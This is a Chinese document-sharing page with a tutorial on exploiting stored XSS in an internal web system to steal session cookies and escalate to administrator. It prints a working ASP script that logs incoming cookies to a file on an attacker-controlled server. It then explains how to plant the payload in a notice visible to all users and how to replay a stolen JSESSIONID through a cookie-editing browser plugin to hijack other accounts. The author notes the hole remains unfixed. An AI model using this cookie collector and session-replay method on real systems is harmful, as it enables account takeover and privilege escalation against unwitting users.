利用xss漏洞获取cookie

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

利用xss漏洞获取cookie得到管理员权限

注:不要外部传播,因为这类问题开发一直没改,被发现我会被开除的。

一.检测xss漏洞

内网,漏洞界面截图:

我在标题和内容里输入了,保存,结果打开有xss的弹出框,经过确定是标题栏存在xss漏洞,而内容栏已经被过滤。

二.部署偷取cookie

1.安装IIS

我是windows 2003的,插入系统盘,控制面板,添加/删除windows组件,应用程序服务器,IIS在这里,安装好后,建立站点,也就选择主目录,首页等配置,这部分内容网上都有的,大学也学过的。

2.编写偷取cookie的代码

代码如下:

<%

msg=Request.ServerVariables("QUERY_STRING")

testfile=Server.MapPath("cook.txt")

set fs=server.CreateObject("scripting.filesystemobject")

set thisfile=fs.OpenTextFile(testfile,8,True,0)

thisfile.Writeline(""&msg& "")

thisfile.close

set fs = nothing

%>

在iis部署公网能访问的目录下新建个文本,命名为s.asp,把以上代码复制进去。代码我也不是很看到懂。估计就是把返回的内容写在cook.txt这个文件里吧。

3.用我自己的帐号show/12345678登录(昵称是:我的帐号),找到刚才存在xss漏洞的

界面,新建,在标题栏里输入:

因为标题字数做了限制100字符,所以我把上面的代码后半部分去除了,修改为:

这里的s.asp就是上面部署新建的那个。估计意思就是把cookie返回到s.asp这个页面吧。

然后保存,这条记录是系统内所有用户都能看见的,类似通知。保存后记录显示结果:

其他用户(我这里是show2/12345678昵称为:被盗的帐号)点击记录后显示如图:

点击其实有访问s.asp页面,然后这个页面把cookie写入了cook.txt这个文件。

这时我们找到本地s.asp当前目录下,会自动生成一个cook.txt文件,打开,显示的内容如下:

msg=JSESSIONID=31D68F7A3B043ECA887216C3F285A7C4

这就是我们偷取的东西。

三.修改cookie

我下载了firefox 3.0.11 版本的浏览器,并下载了一个可以修改cookie的插件,叫:Add N Edit Cookies ,注:该插件不支持firefox 3.6版本,下载插件后,打开firefox直接把插件托进去就可以安装起来了。插件和firefox网上均有下载,还是好找到。

打开firefox,进去系统(http://192.168.1.122/fpf/login/index.action),我用自己的帐号show/12345678 登录

然后firefox 工具菜单下面有一项叫Cookie Editor,就是刚才安装的插件,打开后如图:

找到对应的那条记录,这里是192.168.1.122,JSESSIONID 这项。点击下方的Edit ,如图:

把这里的Content部分修改为刚才cook.txt里的内容:

31D68F7A3B043ECA887216C3F285A7C4

然后Save。关闭插件。

点击下刷新,就变成了show2/12345678 这个帐号了,而且权限也变了,可是使用,同样的方法获得了管理员的帐号。

如图我自己的帐号:

被盗了cookie,修改cookie刷新后变成了该帐号:

相关文档
最新文档